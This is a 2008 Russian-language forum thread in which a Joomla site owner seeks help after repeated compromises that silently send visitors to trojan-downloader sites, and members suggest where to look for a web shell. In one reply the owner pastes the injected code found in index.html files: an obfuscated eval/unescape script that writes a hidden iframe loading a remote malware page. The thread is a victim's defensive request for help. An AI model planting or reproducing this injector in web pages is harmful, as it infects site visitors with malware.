0 Пользователей и 1 Гость просматривают эту тему.
  • 13 Ответов
  • 2606 Просмотров
*

Vovan4elli

  • Новичок
  • 2
  • 0 / 0
  • Я не веб-мастер, я только учусь
Привет всем знатокам, я буквально плачу  >:(

Второй раз за месяц хакают сайт! Я до сих пор не понял как и где это сделали, суть в том что при загрузке страниц пользователя несколько раз кидает на сайты где их ждет троян довлоадер. Первый раз стояла joomla paranoia сейчас Lavra и та же морковка, подскажите где искать и что делать.  !!!???!!!
*

era

  • Администратор
  • 1588
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Неоднократный взлом сайта
« Ответ #1 : 16.01.2008, 18:32:57 »
ищи по форуму - неоднократно обсуждалось.
всего 3-и или 4-е шага.

P.S> и на антивирус не надо забивать.
*

temniy

  • Захожу иногда
  • 413
  • 85 / 9
Re: Неоднократный взлом сайта
« Ответ #2 : 16.01.2008, 18:37:49 »
Паранойя и Лавра это одно и  то же.
Помимо антивируса и поиска виря у себя рекомендую проверить нет ли шелла на сервере. Опять же смотри в поиске - как искать.
Лучший хостинг от 1 евро!
Сервис whois  |  Домены по отличным ценам (более 80 зон, хорошие цены и консультации -> после регистрации)
*

Vovan4elli

  • Новичок
  • 2
  • 0 / 0
  • Я не веб-мастер, я только учусь
Re: Неоднократный взлом сайта
« Ответ #3 : 16.01.2008, 19:47:39 »
ищи по форуму - неоднократно обсуждалось.
всего 3-и или 4-е шага.

P.S> и на антивирус не надо забивать.

Как раз антивирус и нашел это дело. По форуму поискал ничего подобного нет.

Паранойя и Лавра это одно и  то же.
Помимо антивируса и поиска виря у себя рекомендую проверить нет ли шелла на сервере. Опять же смотри в поиске - как искать.

Виря на моем компе нет и не было, он попал на сайт из вне, как раз шелл мне и надо найти. Индексные файлы нетронуты,конфигурационные тоже .htaccess в порядке. Где искать я не знаю.
*

iT)ZevS(

  • Захожу иногда
  • 177
  • 31 / 2
Re: Неоднократный взлом сайта
« Ответ #4 : 16.01.2008, 20:04:31 »
после того как взломали надо искать через что и фиксить дырки
*

era

  • Администратор
  • 1588
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Неоднократный взлом сайта
« Ответ #5 : 16.01.2008, 20:15:50 »
вспоминай откуда ещё по FTP заходил на сайт.
с работы? от друга? второй админ есть на сайте? или дизайнер? шэф?
*

temniy

  • Захожу иногда
  • 413
  • 85 / 9
Re: Неоднократный взлом сайта
« Ответ #6 : 16.01.2008, 22:45:21 »
шелл найти просто - проверь все файлы во всех папках, сравни с дистрибутивом. Если есть лишнее - наверное это оно. Если лишнего нет, проверь все файлы также по датам, в общем все даты должны быть одинаковы, а у шелла будет другая. Ищи по слову шелл, тема обсуждалась и неоднократно.
Лучший хостинг от 1 евро!
Сервис whois  |  Домены по отличным ценам (более 80 зон, хорошие цены и консультации -> после регистрации)
*

Vovan4elli

  • Новичок
  • 2
  • 0 / 0
  • Я не веб-мастер, я только учусь
Re: Неоднократный взлом сайта
« Ответ #7 : 17.01.2008, 10:13:15 »
после того как взломали надо искать через что и фиксить дырки

Легко сказать, я сделал все что мог, выставил chmod, отключил все ненужные функции php, обновился до последней версии joomla.

вспоминай откуда ещё по FTP заходил на сайт.
с работы? от друга? второй админ есть на сайте? или дизайнер? шэф?

Я единственный, работал тока с рабочего компа, сетка и комп хорошо защищены от вирей. Дизайн тож мой, шеф доступа не имеет.

шелл найти просто - проверь все файлы во всех папках, сравни с дистрибутивом. Если есть лишнее - наверное это оно. Если лишнего нет, проверь все файлы также по датам, в общем все даты должны быть одинаковы, а у шелла будет другая. Ищи по слову шелл, тема обсуждалась и неоднократно.

Я понимаю. Но перелапатить весь дистрибутив не так просто, может есть первостепенные директории где стоит искать?
*

Alex_A

  • Осваиваюсь на форуме
  • 35
  • 11 / 0
Re: Неоднократный взлом сайта
« Ответ #8 : 17.01.2008, 10:46:14 »
Цитировать
суть в том что при загрузке страниц пользователя несколько раз кидает на сайты

Посмотри на какой компонент заходишь?
Перекидыват сразу или на определенных страницах?
www.interesno.dn.ua - все, что интересно!
*

Vovan4elli

  • Новичок
  • 2
  • 0 / 0
  • Я не веб-мастер, я только учусь
Re: Неоднократный взлом сайта
« Ответ #9 : 17.01.2008, 11:42:06 »
Ну наконец! Нашел этот поганый скрипт! Он есть почти в каждой директории в файле index.html который по идее далжен содержать токо <html><body></body></html> вместо этого он содержит вот это чудо:

Код
<html><body bgcolor="#FFFFFF"></body></html><script type='text/javascript'>
<!--
var msg=314,d=document;
eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%30%65%30%32%38%32%34%31%66%31%66%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%73%74%61%62%72%6f%6f%6d%2e%63%6e%2f%33%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%34%37%34%30%29%2b%27%33%30%66%64%37%34%63%5c%27%20%77%69%64%74%68%3d%34%34%36%20%68%65%69%67%68%74%3d%31%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );
//-->
</script>

Теперь понятно где, но непонятно как. Вот лог сервера за это число но никаких подозрительных вещей я там не нашел, что наводи на мысли что проникли на сайт через FTP, пароль к нему и к БД я сменил только вот поможет ли?

Посмотри на какой компонент заходишь?
Перекидыват сразу или на определенных страницах?

На всех поголовно, даже в админке. Он не перекидывает, страничка открывается но в тихом режиме посылаются три запросы на сайты которые подсовывают TrojanDownloader.IFrame.

[вложение удалено Администратором]
« Последнее редактирование: 17.01.2008, 11:51:37 от Vovan4elli »
*

era

  • Администратор
  • 1588
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Неоднократный взлом сайта
« Ответ #10 : 17.01.2008, 12:04:08 »
Ищи всё-таки вирус у себя на компе, если больше никому доступ по FTP не давал.
*

Vovan4elli

  • Новичок
  • 2
  • 0 / 0
  • Я не веб-мастер, я только учусь
Re: Неоднократный взлом сайта
« Ответ #11 : 17.01.2008, 12:40:00 »
а в логах доступа по фтп что нить есть за тот период?

У меня нет доступа к этим логам. Попробую написать хостеру...

Ищи всё-таки вирус у себя на компе, если больше никому доступ по FTP не давал.

Уже искал и не один раз и разными антивирусами Нодом и Каспером. Да и к тому же первый раз хакнули когда я даже фтп не пользовался. Просто в один прекрасный день зашел на сайт и был приятно удивлен писку антивируса.
*

Messer

  • Захожу иногда
  • 54
  • 0 / 0
Re: Неоднократный взлом сайта
« Ответ #12 : 09.02.2008, 20:50:26 »
ftp не пользовался? А дистриб как на хост попал?
Ищи троян! некоторые трояны еще скан с клавиатуры делают... Так что совсем не важно сохранял ты пассы или нет
*

temniy

  • Захожу иногда
  • 413
  • 85 / 9
Re: Неоднократный взлом сайта
« Ответ #13 : 10.02.2008, 20:20:31 »
хороший анти-вирус-троян-руткит - http://z-oleg.com/secur/avz/
программа бесплатна
Лучший хостинг от 1 евро!
Сервис whois  |  Домены по отличным ценам (более 80 зон, хорошие цены и консультации -> после регистрации)
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 672
Просмотров: 228118
Последний ответ 19.06.2021, 15:09:01
от wishlight
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 649
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 3779
Последний ответ 28.08.2020, 22:00:30
от cntrl
IPSecure - защита сайта от ботов

Автор SeBun

Ответов: 7
Просмотров: 4416
Последний ответ 05.12.2019, 23:42:43
от SeBun
Письма от имени сайта

Автор homecraft

Ответов: 17
Просмотров: 769
Последний ответ 14.06.2019, 19:22:23
от xpank